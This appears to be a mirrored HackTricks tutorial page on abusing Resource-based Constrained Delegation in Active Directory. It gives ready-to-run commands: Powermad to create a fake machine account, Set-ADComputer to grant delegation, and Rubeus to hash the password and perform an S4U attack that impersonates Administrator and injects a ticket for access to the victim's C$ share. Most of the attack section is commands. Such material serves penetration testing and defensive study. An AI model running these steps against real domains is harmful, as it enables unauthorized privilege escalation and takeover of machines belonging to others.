mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-07 02:38:54 +00:00
106 lines
5.3 KiB
Markdown
106 lines
5.3 KiB
Markdown
|
# Resource-based Constrained Delegation
|
||
|
|
||
|
## Basics of Resource-based Constrained Delegation
|
||
|
|
||
|
This is similar to the basic [Constrained Delegation](constrained-delegation.md) but **instead** of giving permissions to an **object** to **impersonate any user against a service**. Resource-based Constrain Delegation **sets** in **the object who is able to impersonate any user against it**.
|
||
|
|
||
|
In this case, the constrained object will have an attribute called _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ with the name of the user that can impersonate any other user against it.
|
||
|
|
||
|
Another important difference from this Constrained Delegation to the other delegations is that any user with **write permissions over a machine account** \(_GenericAll/GenericWrite/WriteDacl/WriteProperty/etc_\) ****can set the _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ \(In the other forms of Delegation you needed domain admin privs\).
|
||
|
|
||
|
### New Concepts
|
||
|
|
||
|
Back in Constrained Delegation it was told that the _**TrustedToAuthForDelegation**_ flag inside the _userAccountControl_ value of the user is needed to perform a **S4U2Self.** But that's not completely truth.
|
||
|
The reality is that even without that value, you can perform a **S4U2Self** against any user if you are a **service** \(have a SPN\) but, if you **have** _**TrustedToAuthForDelegation**_ the returned TGS will be **Forwardable** and if you **don't have** that flag the returned TGS **won't** be **Forwardable**.
|
||
|
|
||
|
However, if the **TGS** used in **S4U2Proxy** is **NOT Forwardable** trying to abuse a **basic Constrain Delegation** it **won't work**. But if you are trying to exploit a **Resource-Based constrain delegation, it will work** \(this is not a vulnerability, it's a feature, apparently\).
|
||
|
|
||
|
### Attack structure
|
||
|
|
||
|
> If you have **write equivalent privileges** over a **Computer** account you can obtain **privileged access** in that machine.
|
||
|
|
||
|
Suppose that the attacker has already **write equivalent privileges over the victim computer**.
|
||
|
|
||
|
1. The attacker **compromises** an account that has a **SPN** or **creates one** \(“Service A”\). Note that **any** _Admin User_ without any other special privilege can **create** up ****until 10 **Computer objects \(**_**MachineAccountQuota**_**\)** and set them a **SPN**. So the attacker can just create a Computer object and set a SPN.
|
||
|
2. The attacker configures **resource-based constrained delegation from Service A to the victim host**.
|
||
|
3. The attacker uses Rubeus to perform a **full S4U attack** \(S4U2Self and S4U2Proxy\) from Service A to Service B for a user **with privileged access to Service B**.
|
||
|
1. S4U2Self \(from the SPN compromised/created account\): Ask for a **TGS of Administrator to me** \(Not Forwardable\).
|
||
|
2. S4U2Proxy: Use the **not Forwardable TGS** of the step before to ask for a **TGS** from **Administrator** to the **victim host**.
|
||
|
3. Even if you are using a not Forwardable TGS, as you are exploiting Resource-based constrained delegation, it will work.
|
||
|
4. The attacker can **pass-the-ticket** and **impersonate** the user to gain **access to the victim**.
|
||
|
|
||
|
To check the _**MachineAccountQuota**_ of the domain you can use:
|
||
|
|
||
|
```text
|
||
|
Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local | select MachineAccountQuota
|
||
|
```
|
||
|
|
||
|
## Attack
|
||
|
|
||
|
### Creating a Computer Object
|
||
|
|
||
|
You can create a computer object inside the domain using [powermad](https://github.com/Kevin-Robertson/Powermad)**:**
|
||
|
|
||
|
```csharp
|
||
|
import-module powermad
|
||
|
New-MachineAccount -MachineAccount FAKECOMPUTER -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
|
||
|
```
|
||
|
|
||
|
![](../../.gitbook/assets/b1.png)
|
||
|
|
||
|
```bash
|
||
|
Get-DomainComputer FAKECOMPUTER #Check if created if you have powerview
|
||
|
```
|
||
|
|
||
|
### Configuring R**esource-based Constrained Delegation**
|
||
|
|
||
|
```bash
|
||
|
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount FAKECOMPUTER$ #Assing delegation privileges
|
||
|
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it work
|
||
|
```
|
||
|
|
||
|
![](../../.gitbook/assets/b2.png)
|
||
|
|
||
|
### Performing a complete S4U attack
|
||
|
|
||
|
First of all, we created the new Computer object with the password `123456`, so we need the hash of that password:
|
||
|
|
||
|
```bash
|
||
|
.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER /domain:domain.local
|
||
|
```
|
||
|
|
||
|
This will print the RC4 and AES hashes for that account.
|
||
|
Now, the attack can be performed:
|
||
|
|
||
|
```bash
|
||
|
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /domain:domain.local /ptt
|
||
|
```
|
||
|
|
||
|
![](../../.gitbook/assets/b3.png)
|
||
|
|
||
|
### Accessing
|
||
|
|
||
|
The last command line will perform the **complete S4U attack and will inject the TGS** from Administrator to the victim host in **memory**.
|
||
|
In this example it was requested a TGS for the **CIFS** service from Administrator, so you will be able to access **C$**:
|
||
|
|
||
|
```bash
|
||
|
ls \\victim.domain.local\C$
|
||
|
```
|
||
|
|
||
|
![](../../.gitbook/assets/b4.png)
|
||
|
|
||
|
## References
|
||
|
|
||
|
{% embed url="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html" %}
|
||
|
|
||
|
{% embed url="https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/" %}
|
||
|
|
||
|
{% embed url="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution\#modifying-target-computers-ad-object" %}
|
||
|
|
||
|
{% embed url="https://blog.stealthbits.com/resource-based-constrained-delegation-abuse/" %}
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|